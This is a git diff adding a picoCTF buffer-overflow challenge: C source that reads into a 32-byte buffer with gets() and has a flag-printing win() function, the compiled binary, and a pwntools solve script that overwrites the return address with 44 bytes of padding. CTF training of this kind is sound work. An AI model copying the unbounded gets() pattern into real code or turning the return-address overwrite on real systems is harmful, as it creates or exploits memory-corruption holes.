diff --git a/pwn/buffer_overflow_1/solve.py b/pwn/buffer_overflow_1/solve.py new file mode 100755 index 0000000..60b811c --- /dev/null +++ b/pwn/buffer_overflow_1/solve.py @@ -0,0 +1,31 @@ +#!/usr/bin/env nix-shell +#!nix-shell -p python3 -i python3 python3Packages.pwntools + +from pwn import * + +exe = ELF("./vuln") + +context.binary = exe + +ADDR, PORT, *_ = "saturn.picoctf.net 60178".split() + +def conn(): + if args.REMOTE: + r = remote(ADDR, PORT) + else: + r = process([exe.path]) + + return r + +def main(): + r = conn() + + r.recvuntil(b"Please enter your string:") + offset = 44 # found with pwndbg + payload = b'A' * offset + p32(exe.sym.win) + r.sendline(payload) + print(r.recvall()) + r.close() + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/pwn/buffer_overflow_1/vuln b/pwn/buffer_overflow_1/vuln new file mode 100755 index 0000000..05e89bf Binary files /dev/null and b/pwn/buffer_overflow_1/vuln differ diff --git a/pwn/buffer_overflow_1/vuln.c b/pwn/buffer_overflow_1/vuln.c new file mode 100644 index 0000000..e2dcd2c --- /dev/null +++ b/pwn/buffer_overflow_1/vuln.c @@ -0,0 +1,42 @@ +#include +#include +#include +#include +#include +#include "asm.h" + +#define BUFSIZE 32 +#define FLAGSIZE 64 + +void win() { + char buf[FLAGSIZE]; + FILE *f = fopen("flag.txt","r"); + if (f == NULL) { + printf("%s %s", "Please create 'flag.txt' in this directory with your", + "own debugging flag.\n"); + exit(0); + } + + fgets(buf,FLAGSIZE,f); + printf(buf); +} + +void vuln(){ + char buf[BUFSIZE]; + gets(buf); + + printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address()); +} + +int main(int argc, char **argv){ + + setvbuf(stdout, NULL, _IONBF, 0); + + gid_t gid = getegid(); + setresgid(gid, gid, gid); + + puts("Please enter your string: "); + vuln(); + return 0; +} +